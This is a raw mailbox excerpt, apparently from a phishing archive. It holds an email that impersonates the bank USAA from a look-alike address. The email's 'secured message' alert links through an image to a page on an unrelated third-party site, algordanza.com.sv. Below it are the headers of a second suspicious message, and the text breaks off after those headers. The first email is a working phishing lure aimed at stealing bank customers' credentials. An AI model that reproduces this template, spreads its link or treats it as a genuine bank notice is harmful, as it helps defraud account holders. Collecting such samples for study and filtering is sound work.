From: "USAA" <ussaa.info@management.net>
Date: Wed, 09 Nov 2016 11:58:56 -0500
Return-Path: ussaa.info@management.net
Message-ID: <PPAD1VwVn20lbhsKd6Q0000020d@PPAD1.payrollpro.local>
X-OriginalArrivalTime: 09 Nov 2016 16:58:56.0594 (UTC) FILETIME=[8F0BEB20:01D23AAA]
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 428

You will not see this in a MIME-aware mail reader.
--===============1818870073==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

USAA Security Preferences Message Alert.Click below to view secured Message
    =

 =20
--===============1818870073==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head>USAA Security Preferences Message Alert.Click below =
to view secured Message<br>
<p>
<a href=3D"http://algordanza.com.sv/images/sampledata/com.htm">
<img alt=3D"Click on Show Images to Read Secured Message" src=3D"http://alg=
ordanza.com.sv/images/tmp/validation.png" border=3D"0" ></a>
</p>

</body></html>

</html>
--===============1818870073==--

From jose@monkey.org Thu Nov 10 20:05:46 2016 +0000
Return-Path: online.acess.notification@information.com
Delivered-To: jose@monkey.org
X-FDA: 72167912292.06.story54_3212147fa8a62
X-Spam-Summary: 30,2,0,693a31ca7c2de35b,d41d8cd98f00b204,online.acess.notification@information.com,:,RULES_HIT:41:72:355:379:800:871:960:967:969:973:983:988:989:1000:1208:1260:1263:1308:1309:1313:1314:1345:1381:1431:1432:1433:1434:1437:1461:1516:1517:1571:1575:1594:1685:1699:1730:1747:1764:1777:1792:1801:1803:2194:2196:2198:2199:2200:2201:2393:2525:2527:2568:2610:2682:2685:2693:2737:2859:2890:2891:2892:2894:2895:2896:2897:2900:2903:2910:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3392:3585:3586:3866:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4321:4605:4700:4822:5007:6238:6248:6261:6264:6354:6506:6669:6688:6747:6748:7208:7281:7398:7801:8509:8516:8568:8599:8603:8784:8957:9025:9060:9080:9121:9130:9149:9177:9388:9908:10030:10049:10149:10346:10954:11026:11233:11604:11651:11657:11658:11914:12043:12050:12051:12075:12217:12340:12438:12555:12660:12663:12679:12729:12737:12776:12812:12973:12986:130
X-HE-Tag: story54_3212147fa8a62
X-Filterd-Recvd-Size: 158360
Received: from information.com (ns360449.ip-91-121-163.eu [91.121.163.87])
	by imf20.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 10 Nov 2016 20:05:43 +0000 (UTC)
